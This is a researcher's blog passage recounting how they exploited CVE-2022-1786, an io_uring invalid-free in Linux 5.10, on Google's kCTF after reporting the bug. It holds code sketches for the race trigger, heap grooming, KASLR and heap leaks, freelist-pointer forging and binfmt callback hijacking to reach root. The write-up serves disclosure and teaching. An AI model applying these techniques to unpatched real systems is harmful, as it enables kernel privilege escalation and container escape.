Introduction
Back in April, I found a 0-day vulnerability in the Linux kernel and exploited it on Google’s kCTF platform.
I reported the bug to the Linux kernel security team and helped them fix the vulnerability.
Surprisingly, the reporting process was timely and smooth, which I did not expect but found quite awesome.
Anyway, I then submitted my exploit to kCTF in May. After a pretty long wait, I got the response in Aug. Apparently, the kCTF team liked the exploit and granted me the first full bounty ($91,337) in kCTF’s history (this was before the bounty raise that happened a few days after I got the response).
I’m thrilled about the result and really appreciate the recognition of my work!
Thank you, Google!
Then, it was DEF CON, COVID recovery (never regretted attending the DEF CON after-party btw, thank you, perfect r00t and organizers!), and paper deadlines (on that note, stay tuned for some more Linux kernel insanity!). Finally, I have some time to document what happened back then. Hopefully, this blog can inspire more people to join the Linux kernel security community!
Technically, this bug (CVE-2022-1786) is the first bug that I found, analyzed, exploited, and reported alone. This blog is written to commemorate that moment. Thus, it will not be in the style of “what is the correct way to exploit the bug”. Instead, it will document all the frustration and excitement in the crazy 7 days that I spent developing the exploit. I hope you will enjoy the ride!
(And thanks to @Zardus for proofreading this blog. Really appreciate it!)
Overview
In this blog, I will first introduce the vulnerability and the primitive it grants. Then, I’ll share what happened in the 7 days it took me to exploit it on kCTF’s platform.
@sirdarckat was curious why I spent 5 more days on it after getting it working locally in 2 days. This blog is the answer to that question 🙂
Background
The bug exists in the io_uring subsystem of the Linux kernel, more specifically in Linux kernel v5.10, because of its unique identity model. io_uring is a subsystem in Linux that speeds up IO operations.
Traditionally, if we want to do many IO operations in a short time, our program may need to do privilege transitions (through system calls) many times, which is time-consuming (especially with KPTI on because of the constant TLB flushes).
io_uring is designed to fill the gap. It allows us to submit a series of IO operations (or actions related to IO operations, such as timeouts) to the kernel directly, and the kernel will perform them in parallel in different task contexts and finish the needed operations rapidly, without privilege transitions.
This design allows io_uring to achieve much faster IO performance compared with the previous aio implementation [0], so it is growing in popularity among developers and experiencing rapid development.
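To make the usage model concrete, here is a minimal sketch (mine, not from the original post) using the liburing userspace wrapper: a batch of reads is queued up front and submitted with a single syscall.

```c
// Minimal sketch: four reads, one submission syscall (liburing wrapper).
#include <liburing.h>
#include <fcntl.h>

int main(void)
{
    struct io_uring ring;
    struct io_uring_cqe *cqe;
    static char buf[4][64];

    io_uring_queue_init(8, &ring, 0);       // set up the SQ/CQ rings
    int fd = open("/etc/hostname", O_RDONLY);

    for (int i = 0; i < 4; i++) {           // queue 4 reads, no syscall yet
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        io_uring_prep_read(sqe, fd, buf[i], sizeof(buf[i]), i * sizeof(buf[i]));
    }
    io_uring_submit(&ring);                 // one io_uring_enter() submits all 4

    for (int i = 0; i < 4; i++) {           // reap the completions
        io_uring_wait_cqe(&ring, &cqe);
        io_uring_cqe_seen(&ring, cqe);
    }
    io_uring_queue_exit(&ring);
    return 0;
}
```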
However, rapid development == more bugs. In the last two years, we have seen many severe io_uring bugs that can lead to privilege escalation.
For example, @chompie1337 exploited CVE-2021-41073 and wrote a great writeup [10] on how to exploit io_uring bugs (which helped me a lot in understanding CVE-2022-1786). @Awarau and @pql performed an insane exploitation against CVE-2022-29582; their writeup [11] is highly recommended if you want a deep understanding of how io_uring works under the hood.
And I’m aware of a few more such bugs (in io_uring) that were exploited and are under submission to kCTF.
This blog will only focus on the relevant parts of io_uring. For a more detailed and comprehensive understanding of how io_uring works, please refer to @Awarau and @pql’s blog.
Vulnerability
The bug is about a false assumption about which task the function __io_req_init_async can run in, as you can see in the following vulnerable code:
```c
static inline void io_req_init_async(struct io_kiocb *req)
{
	struct io_uring_task *tctx = current->io_uring;
	...
	req->work.identity = tctx->identity;
	...
}
```
It assumes the req (the IO operation request) is submitted by the current task (current), so it assigns the current task’s identity to the request’s work.
However, this assumption is wrong. If two tasks (threads) try to submit IO requests to the same io_uring at the same time, the two requests may be submitted into one work queue and associated with different request tasks, which is by design and expected.
If one of the threads then tries to exit (for example, by calling execve) while IORING_SETUP_IOPOLL is enabled, that specific thread will try to reap all the IO events in the work queue (to make sure they finish), as shown below.
```c
static int io_do_iopoll(struct io_ring_ctx *ctx, unsigned int *nr_events,
			long min)
{
	LIST_HEAD(done);

	list_for_each_entry_safe(req, tmp, &ctx->iopoll_list, inflight_entry) {
		...
		/* iopoll may have completed current req */
		if (READ_ONCE(req->iopoll_completed))
			list_move_tail(&req->inflight_entry, &done);
	}

	if (!list_empty(&done))
		io_iopoll_complete(ctx, nr_events, &done);
```
But if the IO events are not finished, io_uring will attempt to reissue the requests and try its best to finish them (the io_iopoll_complete call above).
However, this time, the new request is initialized (in io_req_init_async, invoked in a deep call chain from io_iopoll_complete) in the thread that is trying to exit, which may be different from the thread that issued the original request.
As a result, in io_req_init_async, current->io_uring (the exiting thread’s io_uring context) may not be req->task->io_uring (the request submitter’s io_uring context), and a wrong identity is assigned to req->work.identity.
Later, when the kernel finishes the IO event and tries to destroy all the io_uring related objects, it will use io_put_identity(req->task->io_uring, req) for this purpose. Notice that this time, it uses the submitter’s io_uring context (req->task->io_uring) in io_put_identity:
```c
static void io_put_identity(struct io_uring_task *tctx, struct io_kiocb *req)
{
	if (req->work.identity == &tctx->__identity)
		return;
	if (refcount_dec_and_test(&req->work.identity->count))
		kfree(req->work.identity);
}
```
Notice that previously, req->work.identity was assigned the exiting thread’s identity, while here tctx is the request submitter’s io_uring context.
Because tctx->identity is &tctx->__identity (identity is a pointer pointing to __identity, the identity struct embedded in struct io_uring_task), we have req->work.identity != &tctx->__identity.
Hence, the kernel thinks req->work.identity is a heap object and tries to free it, while in reality, it is a pointer into the middle of the exiting thread’s struct io_uring_task, as shown below:
```c
struct io_uring_task {
	/* submission side */
	struct xarray		xa;
	struct wait_queue_head	wait;
	struct file		*last;
	struct percpu_counter	inflight;
	struct io_identity	__identity;
	struct io_identity	*identity;
	atomic_t		in_idle;
	bool			sqpoll;
};
```
In other words, the whole process triggers a type confusion that makes the kernel think req->work.identity is a heap object and free it, while it is actually a pointer into the middle of an io_uring_task object. In short, it triggers an invalid-free.
Primitive Analysis
Now let’s have a closer look at the involved objects and see what we have here.
The vulnerability’s symptom is an invalid-free in struct io_uring_task, which is an object in kmalloc-256. Sounds pretty good, right? (Spoiler: NO! It’s the worst part of the exploit!)
We will free &io_uring_task->__identity, which is at offset 0x90 inside an io_uring_task object. As shown in the following diagram, an invalid slot will be added to the slab’s freelist.
This sounds easy: we just need to allocate victim objects at the upper/lower slots and use a heap spray object to occupy the invalid slot, and then we are done! …Right?…
Well, there is a catch here: modern Linux kernels have a protection called CONFIG_HARDENED_USERCOPY, and it is enabled in most vendor kernels. And ofc, COS (Container-Optimized OS, the kernel used in kCTF and Google Cloud) has it enabled as well. The gist of this protection is that it does not allow copy_from_user to copy user data across a slot boundary.
In our case, if we use a heap spray object (e.g. msg_msg) to occupy the invalid slot, the copy_from_user call will be detected and cause the kernel to panic.
I checked all the existing known heap spray objects (back then), and none of them were able to bypass this protection.
Well, technically, one way to bypass this protection is just to use a method that sprays user data without copy_from_user. And I knew at least two methods to do it:
- use the copy_msg logic in msg_msg, where user data is copied into the new msg_msg object using memcpy. But this spray method is transient: it will allocate the msg_msg, write the data, and free the msg_msg. This can reduce exploit reliability because it does not hold the memory. As an exploit reliability kind of guy (a shameless plug for K(H)eaps here [13]), I detest this method and never tried it.
- use simple_xattr (sketched after this list). Although starlabs published a writeup [12] about it in Jun, I knew about it last year and was considering using it in the exploit because this object also uses memcpy to save user data. I didn’t use it because I already had plans for what new techniques to use in this exploit and didn’t want to burn this one (kCTF awards a bigger bounty to exploits with new techniques). Thankfully, I didn’t do it: apparently, valis had already used this technique in (back then) unrevealed submissions to kCTF.
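For reference, here is a rough sketch of the simple_xattr spray idea (my reconstruction; see [12] for the real technique, and note that the usable xattr namespace and filesystem depend on the kernel configuration):

```c
// Rough sketch of the simple_xattr spray (my reconstruction, see [12]).
// setxattr() first copies the value into a temporary kernel buffer with
// copy_from_user(); simple_xattr_set() then memcpy()s it into the
// kmalloc'ed simple_xattr object, so CONFIG_HARDENED_USERCOPY never
// inspects the final allocation.
#include <sys/xattr.h>

static void spray_simple_xattr(const char *file, const void *data, size_t len)
{
    // the target allocation is roughly sizeof(struct simple_xattr) + len,
    // so len is picked to land the object in the cache we want to spray
    setxattr(file, "user.spray", data, len, XATTR_CREATE); // name is illustrative
}
```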
With all these constraints, I decided to go for another route: allocate the victim object in the invalid slot and use the upper/lower slots to overwrite the victim object.
And now, the crazy sleepless 7 days started. Brace yourself! The ride is WILD!
Day 1-2: It works locally!!!
After I started analyzing the bug, it took me a few hours to understand most of what I described above.
Freelist Analysis
Then, I investigated what the freelist looks like for further exploitation.
After some investigation, it appeared that the invalid slot is freed inside the execve call from the exiting thread, while the upper slot (the io_uring_task itself) is freed in a kernel thread. Since we know execve is the call that triggers the vulnerability, it makes sense that the freelist looks like: upper_slot => invalid_slot => ... (lower_slot is not involved in the vulnerability itself; it is just a random slot that overlaps with invalid_slot).
Keep this freelist in mind; it proves to be very important later.
Object Selection
Well, our target cache is kmalloc-256, so let’s think about what interesting objects we can use in this cache.
After some quick examination, I only found three objects in kmalloc-256 that may be interesting for exploitation: struct timerfd_ctx, struct shmid_kernel, and struct msg_queue. After some further investigation, I concluded that only struct timerfd_ctx can be used for leaking KASLR in kCTF’s kernel (if the exploit is not run inside a container, shmid_kernel can do it as well). Considering struct timerfd_ctx can also be used for obtaining PC control [1][2], I decided to use it to occupy the invalid slot, and I used the other objects for heap fengshui.
Heap Fengshui
Now we want to occupy the invalid slot with a struct timerfd_ctx. Ideally, both the upper/lower slots need to be controlled by us as well: if they are not, when the struct timerfd_ctx is allocated, we may accidentally overwrite something unexpected and cause a kernel panic. Since the start of the lower slot will be overwritten, the lower slot must be something without “headers” (such as pointers). I chose msg_msgseg for this purpose.
The details about how msg_msgseg works can be found in Andy Nguyen’s blog [3]. In short, it is a data structure (almost) full of user data, and its content can be read from userspace without freeing the data structure [4]. The only constraint is that the first 8 bytes of a msg_msgseg need to be a pointer. Luckily, they are indeed NULL when the struct timerfd_ctx overwrites into it.
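As a concrete illustration, here is a hedged sketch of allocating such a msg_msgseg (the constants are my back-of-the-envelope values for v5.10 x86_64, not taken from the original exploit):

```c
// Sketch: a System V message longer than DATALEN_MSG (PAGE_SIZE -
// sizeof(struct msg_msg) = 4096 - 48 = 0xfd0 bytes) spills its tail into
// a struct msg_msgseg. The seg's allocation size is 8 bytes (its `next`
// pointer, the NULL mentioned above) plus the remaining data, so a tail
// of up to 0xf8 bytes lands the msg_msgseg in kmalloc-256.
#include <sys/msg.h>
#include <string.h>

static struct { long mtype; char mtext[0x2000]; } mbuf;

static int alloc_msgseg_256(const void *tail, size_t tail_len /* <= 0xf8 */)
{
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    mbuf.mtype = 1;
    memcpy(&mbuf.mtext[0xfd0], tail, tail_len); // bytes past 0xfd0 go to the seg
    msgsnd(qid, &mbuf, 0xfd0 + tail_len, 0);    // allocates msg_msg + msg_msgseg
    return qid;
}
```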
Now the plan is clear: we can use heap grooming to craft a heap layout such that both the upper/lower slots are occupied by msg_msgseg objects and the invalid slot is occupied by a struct timerfd_ctx. The heap layout is shown below:
More specifically, there are typically two types of heap grooming strategies. I am not aware of existing names for them, so I’ll call them the “digging” and “fencing” strategies. The “digging” strategy is about allocating many payload objects and freeing one from the middle of them, so that we know the freed slot will be surrounded by payload objects. The “fencing” strategy was mostly used back in the days when CONFIG_SLAB_FREELIST_RANDOM was not enabled. Back then, freshly created slabs had a linear layout, so we could allocate a ton of payload objects and free every other one, so that every freed slot is surrounded by payload objects. Basically, the “fencing” strategy creates many “good” freed slots, making it more resilient to unexpected heap usage from other kernel components.
The approach I took was a combination of “digging” and “fencing”. In the target kernel, each kmalloc-256 slab has 16 slots. What I did was repetitively spray 16 msg_msgseg objects (to occupy a whole page) and dig one hole (to ensure one hole in that page), repeating all of that 64 times. Ideally, this creates 64 “good” slots that are surrounded by msg_msgseg objects, thus increasing resiliency against unexpected heap usage. Then we allocate a struct io_uring_task in one of the 64 slots, which has a msg_msgseg as its adjacent object. In other words, with this grooming, we can ensure the lower slot is a msg_msgseg object.
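In (hedged) code, the grooming loop would look roughly like this; alloc_msgseg_256() is the helper sketched earlier, and free_msgseg() simply receives the message, releasing both the msg_msg and its seg (all names are mine, not from the original exploit):

```c
// Rough sketch of the combined "digging"/"fencing" grooming.
#define SLOTS_PER_SLAB 16   // kmalloc-256 slots per slab on the target
#define N_SLABS        64

static int  qids[N_SLABS][SLOTS_PER_SLAB];
static char pattern[0xf8]; // recognizable spray pattern

static void free_msgseg(int qid)
{
    msgrcv(qid, &mbuf, 0xfd0 + sizeof(pattern), 0, IPC_NOWAIT);
}

static void groom(void)
{
    for (int slab = 0; slab < N_SLABS; slab++) {
        // fill (ideally) a whole kmalloc-256 slab with msg_msgseg objects
        for (int slot = 0; slot < SLOTS_PER_SLAB; slot++)
            qids[slab][slot] = alloc_msgseg_256(pattern, sizeof(pattern));
        // "dig" one hole per slab: the freed slot is fenced in by our
        // msg_msgseg objects on both sides
        free_msgseg(qids[slab][SLOTS_PER_SLAB / 2]);
    }
    // the io_uring_task triggered later should land in one of these 64
    // holes, giving it a msg_msgseg as its lower neighbor
}
```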
Now the question is: how to ensure the upper slot is also something we control?
Well, as we mentioned before, the freelist will be: upper_slot => invalid_slot. If we try to spray struct timerfd_ctx, the one in the upper slot will be corrupted by the one in the invalid slot. And if we try to spray user-controlled objects like msg_msg, we will get a kernel panic when one lands on invalid_slot (because of CONFIG_HARDENED_USERCOPY).
So what do we do?
The approach I took abuses the fact that those objects partially overlap. I allocate a struct timerfd_ctx and check whether any msg_msgseg object’s content has changed. If yes, we just landed a timerfd on the invalid slot, and that specific msg_msgseg is at the lower slot; if not, I free the timerfd I just allocated and replace it with a msg_msgseg. This way, we can ensure that when the invalid slot is occupied by a struct timerfd_ctx, the upper slot is a msg_msgseg.
Info Leak
At this point, we have achieved the desired heap layout: the upper/lower slots are both msg_msgseg objects and the invalid slot is a struct timerfd_ctx.
With this heap layout, leaking both heap address and KASLR is easy:
Leak Heap Address
There are a few linked list structs embedded in struct timerfd_ctx, as shown below:
```c
struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	/* to show in fdinfo */
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};
```
When those list structs are empty, they contain pointers pointing back to themselves. As a result, we learn where the timerfd object is in the kernel heap.
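Recovering the object address from such a leak is then a one-liner (a sketch; the field offset is hypothetical and has to be read from the target kernel’s struct timerfd_ctx layout):

```c
// Sketch: an empty wait queue head's list pointers point to itself, so
// subtracting the field offset from the leaked value yields the
// timerfd_ctx address, i.e. the address of the invalid slot.
#define TIMERFD_CTX_WQH_OFF 0x68 // hypothetical; check the target vmlinux

static unsigned long timerfd_addr_from_leak(unsigned long leaked_list_ptr)
{
    return leaked_list_ptr - TIMERFD_CTX_WQH_OFF;
}
```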
Bypass KASLR
Leaking the kernel base to bypass KASLR from a struct timerfd_ctx has been done before. I learnt from @FizzBuzz101 that if you arm the timer (essentially, call timerfd_settime with CLOCK_REALTIME on a timerfd), its timerfd_ctx->tmr.function will be set to timerfd_tmrproc(), which is a kernel .text pointer.
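Planting that pointer is just a couple of calls (a sketch; the timeout value is arbitrary):

```c
// Sketch: arming the timer makes the kernel set tmr.function to
// timerfd_tmrproc, a .text pointer we can read back through the
// overlapping msg_msgseg and use to compute the KASLR slide.
#include <sys/timerfd.h>

static int arm_timerfd(void)
{
    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    struct itimerspec its = { .it_value = { .tv_sec = 1000 } };
    timerfd_settime(tfd, 0, &its, NULL); // arm far in the future
    return tfd;
}
```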
Let’s ROP!
Now we have all the leaks, and we have two choices for how to proceed with the exploit:
- overwrite timerfd_ctx->tmr.function; then, when the timer is triggered, we will have PC control.
- free the timerfd and hijack the freelist in the lower slot.
I first attempted approach 1 and could easily get to ROP. However, the exploit is far from over. The issue here is that this function is called in interrupt context, which means that when we get to ROP, the kernel’s execution is not associated with any task. Thus, we can’t directly return back to userspace. Worse still, there is no known way to end the execution gracefully. I tried do_task_dead to end the execution, but since we are not in a task, the kernel is not happy about killing a non-task: it triggers a BUG(), then crashes.
In fact, two past blogs show how to tackle this situation [1][2]. However, FizzBuzz101’s approach will crash the kernel shortly after returning back to userspace (because we are in an interrupt context, which is not supposed to get to userspace), which is not so good. I tried D3v17’s approach as well, but somehow I could not make it work on the target kernel: I would see a message like BUG: scheduling while atomic and the kernel would crash.
I got stuck here for a bit, then decided to go for approach 2.
Hijacking the slab freelist is possible because when the invalid slot is freed again, its forward pointer (of the freelist) will be stored inside the lower slot. In modern Linux, forward pointers are stored in the middle of objects; in kmalloc-256, the offset is 0x80. So, the address of the invalid slot’s forward pointer is invalid_slot_addr + 0x80 = upper_slot_addr + 0x90 + 0x80 = upper_slot_addr + 0x110 = lower_slot_addr + 0x10.
Now let’s continue.
The target kernel has CONFIG_SLAB_FREELIST_HARDENED enabled, which means the freelist pointers will be encoded as follows:
```c
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
				 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
	return (void *)((unsigned long)ptr ^ s->random ^
			swab((unsigned long)(void *)ptr_addr));
#else
	return ptr;
#endif
}
```
kileak demonstrated [5] that if we know ptr_addr (the address the forward pointer is stored at), ptr (the forward pointer itself), and the encoded value, then we can calculate s->random, forge any encoded value, hijack the slab freelist just like before, and obtain arbitrary write.
However, in our current setup, we only know ptr_addr, and we have no way to control ptr itself.
But we can fill up the whole slab and then free the timerfd (at the invalid slot). In this way, we force ptr to be NULL (because it is the only free slot in the slab) and can leak s->random for hijacking the freelist.
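Following freelist_ptr() above, the arithmetic is straightforward (a sketch; variable names are mine):

```c
// With the slab otherwise full, the freed timerfd's forward pointer is
// NULL, so the encoded value read through the lower msg_msgseg directly
// reveals s->random; after that we can forge arbitrary freelist entries.
#include <stdint.h>

static inline uint64_t swab64(uint64_t x) { return __builtin_bswap64(x); }

// encoded = ptr ^ s->random ^ swab(ptr_addr); here ptr == NULL
static uint64_t leak_random(uint64_t encoded, uint64_t ptr_addr)
{
    return encoded ^ swab64(ptr_addr);
}

// value to write at ptr_addr (via the lower msg_msgseg) so that a later
// kmalloc-256 allocation returns `target`
static uint64_t forge_entry(uint64_t target, uint64_t rnd, uint64_t ptr_addr)
{
    return target ^ rnd ^ swab64(ptr_addr);
}
```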
Using the freelist hijacking primitive, we can perform arbitrary write.
binfmt to Privilege Escalation
At this stage, we have all the leaks and an arbitrary write primitive. If container escape were not needed, I would just overwrite modprobe_path and get root easily.
But it is needed, so we have to get PC control, then ROP and escape from the container (well, this was true back then, but @BillyQAQ and I found something interesting a few months afterwards 😛).
Anyway, my solution was to overwrite a binfmt and then ROP. I have never seen anybody abuse binfmt for kernel exploitation in the past, so I believe it is a new technique (let’s keep a count: novel technique No.1). What I abuse is how the Linux kernel loads executables.
The way Linux loads executables is to go through a list of binfmts called formats [6] and use each binfmt’s load_binary handler [7] to see whether the executable is recognized by any of the formats. If the executable is not recognized by any of them, the kernel will try to load a corresponding kernel module (which is what enables the modprobe_path exploitation technique). The logic lives in search_binary_handler, as shown below:
```c
static int search_binary_handler(struct linux_binprm *bprm)
{
	...
	read_lock(&binfmt_lock);
	list_for_each_entry(fmt, &formats, lh) {
		if (!try_module_get(fmt->module))
			continue;
		read_unlock(&binfmt_lock);

		retval = fmt->load_binary(bprm);

		read_lock(&binfmt_lock);
		put_binfmt(fmt);
		if (bprm->point_of_no_return || (retval != -ENOEXEC)) {
			read_unlock(&binfmt_lock);
			return retval;
		}
	}
	read_unlock(&binfmt_lock);

	if (need_retry) {
		...
		if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
			return retval;
		...
	}

	return retval;
}
```
Most importantly, these binfmt structures are writable!!!
So, what we can do is use the arbitrary write primitive to overwrite one of the binfmts’ load_binary callbacks and get PC control (then ROP). My choice was misc_format, because it comes after elf_format in the formats list. This way, I can get PC control by trying to execute an invalid executable while still being able to execute ELFs.
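Triggering the hijacked callback is then as simple as executing something elf_format rejects (a sketch; path and contents are illustrative):

```c
// Sketch: a file with a bad magic makes elf_format return -ENOEXEC, so
// the formats list walk reaches misc_format and calls the overwritten
// load_binary pointer.
#include <fcntl.h>
#include <unistd.h>

static void trigger_binfmt_rop(void)
{
    int fd = open("/tmp/not_an_elf", O_CREAT | O_WRONLY, 0755);
    write(fd, "AAAAAAAA", 8);              // not a recognizable format
    close(fd);
    char *argv[] = { "/tmp/not_an_elf", NULL };
    execve("/tmp/not_an_elf", argv, NULL); // PC control inside load_binary
}
```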
Then we can start ROPing from there and use the normal privilege escalation payload to get root. And indeed, it worked locally.
Me back then:
Easy Peasy. Only took me 2 days to get a working exploit, I’m so good. Let’s get the flaaaaaag on kCTF!!!!
And… nothing happened.
Day 3-4: Panic! Panic! Panic! The Night Falls!
Panic No.1
Yes, after carefully planning everything like a mastermind, and all the effort spent, the kernel didn’t even crash?! What is going on?!
At that point, I had pwned kCTF twice (CVE-2021-4154 and CVE-2022-29581) and had never seen that before. Worse still, I launched a VM on Google Cloud with the same kernel, and the exploit did not even crash my own VM.
So, I started thinking maybe the bug was not triggerable on their platform.
However, after some investigation, I realized that it was because the way I triggered the vulnerability did not work with tmpfs. As I mentioned previously, this bug can be triggered only if IORING_SETUP_IOPOLL is enabled. But this option can only be enabled if a file can be opened with the O_DIRECT flag [8], and apparently tmpfs does not support O_DIRECT. So the way I triggered the vulnerability, which was to write a huge amount of data to a tmpfs file, would not work in kCTF’s environment.
After trying to write the data to a non-tmpfs file, my exploit could crash the VM on Google Cloud. I got super excited: crash == root shell given some more time.
Panic No.2
The reality soon gave me a slap in the face: the only writeable region on kCTF’s platform is tmpfs.
Now how am I supposed to trigger the vulnerability?
I got super frustrated at that moment but I didn’t give up. Rather, I started reading the kernel source code while at the same time thinking about other possible ways to trigger the vulnerability.
Soon, an idea struck me: the root cause of the bug is the kernel trying to re-issue unfinished IO actions when a thread is exiting. The IO actions don’t have to be write actions; they can be long read actions as well (so that they won’t finish before the thread calls exit).
I wrote a quick proof-of-concept crasher that attempts to read a whole library in one go and then sprays msg_msgseg objects, so that if the vulnerability is triggered, it will crash the kernel by being detected by CONFIG_HARDENED_USERCOPY. Indeed, it could crash the VM on Google Cloud.
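The trigger looked roughly like the following (a simplified reconstruction with liburing, not the original PoC; the real crasher loops and sprays msg_msgseg around this):

```c
// Sketch of the trigger: an IOPOLL ring needs an O_DIRECT fd; a big read
// is submitted from one thread, and a second thread that submitted to the
// same ring calls execve() while the read is still inflight.
#define _GNU_SOURCE
#include <liburing.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

static struct io_uring ring;
static int fd;
static void *small_buf;

static void *exiter(void *arg)
{
    // this thread submits its own read so it gets its own io_uring_task
    io_uring_prep_read(io_uring_get_sqe(&ring), fd, small_buf, 0x1000, 0);
    io_uring_submit(&ring);
    char *argv[] = { "/bin/true", NULL };
    execve("/bin/true", argv, NULL); // exit while the reads are inflight
    return NULL;
}

int main(void)
{
    void *big_buf;
    io_uring_queue_init(64, &ring, IORING_SETUP_IOPOLL);
    fd = open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY | O_DIRECT);
    posix_memalign(&big_buf, 4096, 1 << 20);  // O_DIRECT wants alignment
    posix_memalign(&small_buf, 4096, 0x1000);

    io_uring_prep_read(io_uring_get_sqe(&ring), fd, big_buf, 1 << 20, 0);
    io_uring_submit(&ring);                   // one big, slow read

    pthread_t t;
    pthread_create(&t, NULL, exiter, NULL);   // race: execve vs. the read
    pthread_join(t, NULL);
    return 0;
}
```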
Panic No.3
However, it still could not crash the kernel on kCTF’s platform.
This got me worried. I tried to trigger the vulnerability on many large files (libc and other libraries) manually, but the result was all the same: it could crash the VM on the cloud but not kCTF’s kernel.
After even more investigation, I found out why: the access we are given on kCTF is inside a docker container, and the base of the file system is overlayfs, which does not support O_DIRECT (this may not be entirely true: some files could be opened with O_DIRECT but could not be used to crash the kernel for some unknown reason).
Then I got mad and basically scanned the whole file system, trying to open every readable file with the O_DIRECT flag, and I got a handful.
Then I tried to trigger the vulnerability against each file that could be opened with O_DIRECT, and then, BANG! /etc/resolv.conf crashed the kernel!
(I later told zplin (@Markak_) about this trick, which hopefully assisted him in exploiting CVE-2022-20409, a variant of CVE-2022-1786.)
Winning The Race
Now we can trigger the vulnerability on kCTF’s platform by using /etc/resolv.conf. But there is an issue: this file is tiny, just a little over 100 bytes. As a result, we cannot trigger the vulnerability reliably: we have to race to exit one thread before it finishes reading the file.
But how can we win the race reliably, or at least know when the vulnerability has been triggered before going all-in on the exploitation?
My answer was to try again and again and use a side channel to tell whether the vulnerability has been triggered, as shown below:
If the vulnerability is triggered, its freelist forward pointer will be written into the lower slot. Recall that the lower slot is a msg_msgseg object.
We can simply check every msg_msgseg object and see whether the content of any of them has changed to infer whether the vulnerability was triggered. By doing this, we also learn which msg_msgseg is at the lower slot, which is important for later exploitation (for example, hijacking the freelist).
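A sketch of the peek (it reuses the mbuf/pattern helpers from the grooming sketch; offsets are my assumptions, consistent with the msg_msgseg sizes above):

```c
// Sketch: MSG_COPY (requires CONFIG_CHECKPOINT_RESTORE and _GNU_SOURCE)
// copies a message out of the queue without dequeuing it, so the
// msg_msgseg survives the peek and can be re-checked after every attempt.
#include <string.h>
#include <sys/msg.h>

static int seg_changed(int qid)
{
    static struct { long mtype; char mtext[0x1100]; } m;
    msgrcv(qid, &m, sizeof(m.mtext), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
    // mtext bytes past DATALEN_MSG (0xfd0) live in the msg_msgseg; if they
    // no longer match the sprayed pattern, the invalid free happened here
    return memcmp(&m.mtext[0xfd0], pattern, sizeof(pattern)) != 0;
}
```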
In short, all we need to do is to:
- do heap grooming
- try to trigger the vulnerability using a read action (OP_READ)
- check whether it is triggered using the side-channel
- if triggered, go to step 5, if not, rinse and repeat.
- hijack the freelist and use binfmt for LPE
I wrote another version of the exploit implementing the above logic, which enhanced the exploit a lot.
And this version achieved near 100% success rate locally.
Well, have a look at the scrollbar, you don’t think the exploit is done, do you?
Day 5-6: The Dark! The Desperate! The Madness!
I tried to run the exploit on kCTF’s platform multiple times, and it somehow consistently crashed at the same place. After many debugging attempts, I figured out that the kernel would somehow crash when the exploit tried to free the timerfd in the invalid slot, which didn’t make any sense. As I mentioned in the “Heap Fengshui” section, the freelist should be upper_slot => invalid_slot; even if there are some freed slots in between, our search algorithm should handle them gracefully as well (or at least succeed sometimes).
Notice that on kCTF’s platform, if the VM crashes, it takes about 5 minutes to reboot. At that point, it had already taken me a few hours to figure out where the crash happened. But little did I know, it was just the start.
To make things worse, somehow the platform was experiencing some bugs at that time: the VMs would not reboot after a few crashes. I had to constantly ping @sirdarckat to ask him to help reboot the servers so I could continue remote debugging. Thank you so much @sirdarckat, and sorry for constantly pinging you!
Freelist, What’s Wrong With You?
At this point, I knew there was something wrong with the heap layout, but I couldn’t figure out why. After some more debugging, I knew there was nothing wrong with the lower slot: it was a msg_msgseg overlapping the invalid slot, and the output showed that the overlapped region indeed belonged to a timerfd.
So, the issue must be on the upper slot.
Then I spent hours staring at my code thinking about situations when the search algorithm might fail consistently. But no luck. I was frustrated, pulling my hair out, and finally decided to go to bed at 3am.
The next morning, I wrote down all the possible states that the upper slot might be in (no matter how ridiculous it might be) when the timerfd is allocated and how to confirm the cases. The notes can be found here.
I tested all the hypotheses one by one. After ruling out the impossible, the one left is the answer, although it doesn’t make sense: somehow, on kCTF’s platform, after the bug is triggered, the freelist is not upper_slot => invalid_slot, it is invalid_slot => upper_slot. This doesn’t make any sense, because the invalid slot is freed by the execve system call (how we trigger the bug in the first place) and should be freed first no matter what. But that is just not the case on kCTF. To this day, I still don’t know why, but I blame Kubernetes, for no clear reason (maybe its cgroup magic prioritizes the kernel thread that frees the upper slot?).
Now I knew the root cause of the crash, but to fix it, I needed to be able to debug it, and my environment was totally different from kCTF’s. To solve the problem, I changed the search algorithm a little bit: I try to allocate timerfds one by one and check whether the content of the msg_msgseg at the lower slot has changed. Once I get a hit, I spray a lot of msg_msg objects, as shown below:
```c
int _search_for_victim()
{
    ...
    for(int i=0; i<SPRAY_MAX; i++) {
        // overwrite the invalid slot
        tfd = timerfd_create(CLOCK_REALTIME, 0);
        ret = msgrcv(lower_msgqid, buffer, sizeof(buffer), 0,
                     MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
        u64 magic = *(u64 *)&buffer[0x1040];
        if(magic == 0xdead4ead00000000) {
            // mid_tfd = timerfd_create(CLOCK_REALTIME, 0);
            mid_tfd = tfd;
            int msgqid = msgqids[i];
            // iron out the weird freelist
            for(int i=0; i<0x10; i++)
                assert(msgsnd(msgqid, buffer, 0xc1-0x30, IPC_NOWAIT) >= 0);
            heap_addr = *(u64 *)&buffer[0x1000] - 0x130;
            printf("mid_tfd: %d, upper_msgqid: %d\n", mid_tfd, upper_msgqid);
            return 1;
        }
    }
    ...
    return 0;
}
```
This way:
- locally, where the freelist is upper_slot => invalid_slot, when the invalid slot is taken, the upper slot will be a timerfd as well (corrupted, but we don’t care as long as we don’t use it)
- on kCTF, where the freelist is invalid_slot => upper_slot, when the invalid slot is taken by a timerfd, the upper slot will still be empty; the sprayed msg_msg will ensure that the slot is taken by us while at the same time not corrupting the timerfd at the invalid slot

In short, we have the two situations converged (at least for the invalid/lower slots).
Freelist, What’s Wrong With You? Again?!
